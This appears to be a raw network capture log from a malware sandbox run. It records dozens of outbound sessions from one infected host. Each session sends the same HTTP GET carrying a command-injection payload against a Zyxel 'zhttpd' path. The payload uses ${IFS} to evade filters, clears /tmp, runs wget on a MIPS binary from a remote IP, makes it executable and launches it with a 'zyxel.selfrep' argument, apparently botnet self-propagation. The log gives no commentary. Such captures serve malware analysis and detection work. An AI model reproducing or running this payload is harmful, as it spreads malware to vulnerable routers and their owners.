                                            Feb 2, 2024 06:21:28.965550900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8713192.168.2.15498584.8.150.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965605974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8714192.168.2.155504478.217.216.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965645075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8715192.168.2.1533568144.78.68.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965651989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8716192.168.2.153376476.91.214.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965682030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8717192.168.2.155682471.79.118.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965756893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8718192.168.2.1547326151.59.153.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965756893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8719192.168.2.155284025.222.5.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965802908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8720192.168.2.1558138200.180.148.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965847015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8721192.168.2.1533726146.151.140.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965907097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8722192.168.2.155845652.7.211.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965946913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8723192.168.2.1536668132.44.13.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965996981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8724192.168.2.1559170144.129.136.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966008902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8725192.168.2.153426899.44.88.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966061115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8726192.168.2.155374459.130.214.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966092110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8727192.168.2.1537556155.64.121.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966118097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8728192.168.2.1554806222.100.86.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966171980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8729192.168.2.1538110140.57.170.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966224909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8730192.168.2.1545062158.255.176.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966229916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8731192.168.2.15518102.111.163.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966284990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8732192.168.2.154217092.24.45.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966317892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8733192.168.2.1551758212.121.42.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966344118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8734192.168.2.1555378131.115.180.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966391087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8735192.168.2.1535430173.184.107.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966429949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8736192.168.2.153610667.98.144.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966471910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8737192.168.2.1556458128.94.217.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966486931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8738192.168.2.1540780190.56.187.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966542006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8739192.168.2.155236458.174.85.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966569901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8740192.168.2.1545132190.119.240.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966619015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8741192.168.2.155882040.216.133.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966634989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8742192.168.2.1542976140.201.216.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966669083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8743192.168.2.1539190159.247.23.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966703892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8744192.168.2.154817095.144.248.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966763973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8745192.168.2.153683278.26.1.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966790915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8746192.168.2.1558344121.208.8.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966849089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8747192.168.2.154143020.121.20.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966880083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8748192.168.2.1537188117.44.234.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966927052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8749192.168.2.1558252182.119.139.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.966974974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8750192.168.2.1534742169.1.111.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.967017889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8751192.168.2.1536820160.20.51.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.967058897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8752192.168.2.1559258102.193.45.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.967108965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8753192.168.2.153777853.205.186.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.967134953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8754192.168.2.1535422133.223.230.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.967161894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8755192.168.2.153880670.218.165.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.967252970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8756192.168.2.1555126206.212.178.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.967253923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8757192.168.2.154535032.165.113.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.978718996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8758192.168.2.1534994129.229.42.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.978755951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8759192.168.2.1536654106.112.58.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.978785992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8760192.168.2.1543426146.140.34.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.978820086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8761192.168.2.156068452.97.152.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.978849888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8762192.168.2.1542584186.28.175.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.978884935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8763192.168.2.1540246141.206.164.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.978948116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8764192.168.2.154059813.229.0.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.978974104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8765192.168.2.1541060212.60.222.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979028940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8766192.168.2.1538412105.130.66.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979068041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8767192.168.2.155102474.154.221.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979094028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8768192.168.2.1546834144.86.250.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979134083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8769192.168.2.154825661.209.202.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979172945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8770192.168.2.1544918170.75.35.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979219913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8771192.168.2.15580445.62.106.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979274035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8772192.168.2.155664683.41.253.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979310036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8773192.168.2.1558482188.146.175.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979423046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8774192.168.2.1538270151.96.238.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979434967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8775192.168.2.1553620197.216.90.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979491949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8776192.168.2.1543818108.15.244.99443
                                            TimestampBytes transferredDirectionData
